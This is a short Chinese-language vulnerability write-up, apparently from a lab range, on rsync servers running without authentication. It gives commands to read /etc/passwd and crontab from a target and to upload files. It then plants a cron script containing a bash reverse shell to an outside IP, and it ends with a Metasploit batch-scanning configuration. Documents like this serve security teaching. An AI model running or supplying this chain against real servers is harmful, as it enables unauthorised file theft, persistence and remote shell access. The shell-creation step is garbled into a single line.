漏洞描述
産生原因
環境搭建
漏洞複現
漏洞發現
漏洞描述
rsync是Linux下一款資料備份工具,支援通過rsync協定、ssh協定進行遠端檔案傳輸。其中rsync協定預設監聽873端口
産生原因
開啟了rsync服務,并且沒有配置ACL或通路密碼,我們将可以讀寫目标伺服器檔案。
環境搭建
使用Vulfocus 漏洞威脅分析平台線上靶場測試:
漏洞複現
判斷:rsync rsync://123.58.224.8:12018/
利用:
-讀取檔案:rsync rsync://123.58.224.8:12018/src/
-下載下傳檔案:rsync rsync://123.58.224.8:12018/src/etc/passwd ./
-上傳檔案:rsync -av passwd rsync://123.58.224.8:12018/src/tmp/passwd
利用定時任務反彈shell
- 擷取資訊
rsync rsync://123.58.224.8:12018/src/etc/crontab /root/cron.txt
- .建立檔案
touch shell #!/bin/bash /bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1 chmod +x shell
- 上傳檔案
rsync -av shell rsync://123.58.224.8:12018/src/etc/cron.hourly //建立一個同名檔案來代替
- 等待接受反彈
漏洞發現
利用msf架構将想要測試的ip批量測試
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run
參考連結
Vulhub - Docker-Compose file for vulnerability environment